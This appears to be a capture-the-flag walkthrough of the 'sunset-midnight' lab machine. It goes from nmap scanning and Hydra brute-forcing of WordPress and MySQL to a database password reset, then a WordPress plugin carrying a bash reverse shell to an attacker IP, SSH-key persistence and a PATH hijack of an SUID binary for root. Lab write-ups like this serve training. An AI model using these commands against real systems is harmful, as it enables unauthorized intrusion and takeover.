835b797b1e2e3a1bd8c520ebcfe40a9f.png

0. Preface

This is a very straightforward machine. There is a small rabbithole right at the start with the Simply Poll plugin, though.

In this box, we will be tackling:

  1. Weird Hydra results.
  2. Resetting WordPress passwords through the database.
  3. Getting a reverse shell using a WordPress “plugin”.
  4. Exploiting an SUID binary

1. Preliminary NMAP Scan

sudo nmap -sC -sV -oN nmap.txt 192.168.32.9 -v

2a2b126914bf9898bdbb0227c44a1fac.png

Port 80 is open, and the robots.txt has an entry - /wp-admin. This is most likely running WordPress. We also rarely see port 3306 open on a box. We definitely need to check that out as well.

2. WordPress Login

Let’s start with the website.

3f22d7d9bbd27c10eeb9c64238b12d4a.png

Nothing much to see here. Let’s try to bruteforce /wp-admin with Hydra.

hydra -l admin -P /usr/share/wordlists/rockyou.txt sunset-midnight http-post-form "/wp-admin:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered for the username"

5313d3c9b89ae1fc7dcd97badd643122.png

Interestingly, Hydra gives us a bunch of credentials, but none of them work. Let’s move on to the SQL server on port 3306. Same thing, we are going to try to bruteforce this again with Hydra.

hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://sunset-midnight

1389fe2299e6ccfb17e77bb22111c1d3.png

We got a hit - root:robert. Let’s login.

mysql -u 'root' -p -h 192.168.32.9

e1020cd2a9b0b516fc68d872b831ec6f.png

Let’s do a basic enumeration of databases.

select * from information_schema.schemata;

4685a1bab189036c2951f78537d32706.png

Now, let’s see what’s inside wordpress_db.

select table_name from information_schema.tables where table_schema='wordpress_db';

eab6436ee969c0af1012a144ee4da617.png

Alright, seems like we have a users table. Let’s see if we can’t find some passwords.

use wordpress_db;
select * from wp_users;
select user_login,user_pass from wp_users;

3493869df3e4dd0c3d7e853b3d8b7a94.png

Let’s try to crack the hash with John.

sudo john --wordlist:/usr/share/wordlists/rockyou.txt wp-admin.hash
sudo john --show wp-admin.hash

7227758a6091a8617214895c6275e119.png

No luck here, so let’s try resetting the password to admin in the database directly.

update wp_users set user_pass = md5('admin') where id=1 limit 1;

d757489c783f327fc81c44efe8947b22.png

Now we can try to login to /wp-admin with admin:admin.

11cde12aca2dcdbfa3812430c7064c43.png

And we’re in.

3. WordPress Plugin Reverse Shell

Now that we’re in, we can try to get a reverse shell going through WordPress plugins. Let’s create the following PHP file as our “plugin”, then zip it.

<?php 

/**
* Plugin Name: abcdefg
* Author: hijklmnop
*/

shell_exec(bash -c 'bash -i >& /dev/tcp/192.168.32.4/8000 0>&1);
?>
7z a rev.zip rev.php

525d855bfdbb0d5105b6d21a37f64645.png

Now we can upload the plugin, setup a netcat listener on port 8000, then activate the plugin to trigger the reverse shell.

923b4b04b6dd336b95b0411f9a8427bb.png

36761ae82c084da68ae3131e7e2051e1.png

4. Pivoting to User

Since we’re logged on as www-data, let’s take a look at /etc/passwd to determine who we need to pivot to.

3ca20eef74e04739beeaeb2902c6007f.png

Let’s see if we can’t pivot to jose. We can automatically enumerate this machine with linpeas.sh, so let’s upload and run that.

675782816ce7cce6bb21057143e2bac7.png

We got some potential credentials in wp-config.php - jose:645dc5a8871d2a4269d4cbe23f6ae103. Let’s try to su to jose using the credentials.

e8707c6c288b1e62500c17e926d1807e.png

Now we’re in. Let’s grab the user flag first.

Next, for a more permanent foothold, we will generate a SSH key with ssh-keygen.

d403289a0c3d34cc18ca5d9f030f1eb9.png

Now that we have generated the private and public key pair, we need to copy and paste the contents of id_rsa.pub into /home/jose/.ssh/authorized_keys.

8ddfaf4366820c14a1877a4809703598.png

Let’s log back into SSH using the private key.

ssh jose@192.168.32.9 -i ./keys/id_rsa

bdc4ed3bea1d42a0d0c75dc44775bba8.png

5. Exploiting SUID to Root

Let’s upload and run linpeas.sh again.

72fb632bf2e19d1ce97f315db27fb288.png

In the output, we see a file, /usr/bin/status, which has SUID/SGID set. This file is most likely a custom binary. Running the file produces an error.

cb1168153b5a76b305d4cac915f691a7.png

Let’s run strings on it to roughly see what it does.

5e1557f429d9037db0e5eabccc049fa2.png

It looks like it’s trying to run the service binary which doesn’t exist on this box. We can create our own service in /home/jose to execute /bin/bash as root with the follwing script.

#!/bin/bash

bash -c /bin/bash

For this to work, we will also need to add /home/jose to the $PATH environment variable.

export PATH=/home/jose:$PATH

f3bec1579c033784179648994857bc47.png

Next, we can run which service to verify that the script will be run when executing service.

452fe132c91c1e83bcd46ed351b5b00b.png

Now, let’s run /usr/bin/status and get a root shell.

73553e5a23c3474c314656b984773d0f.png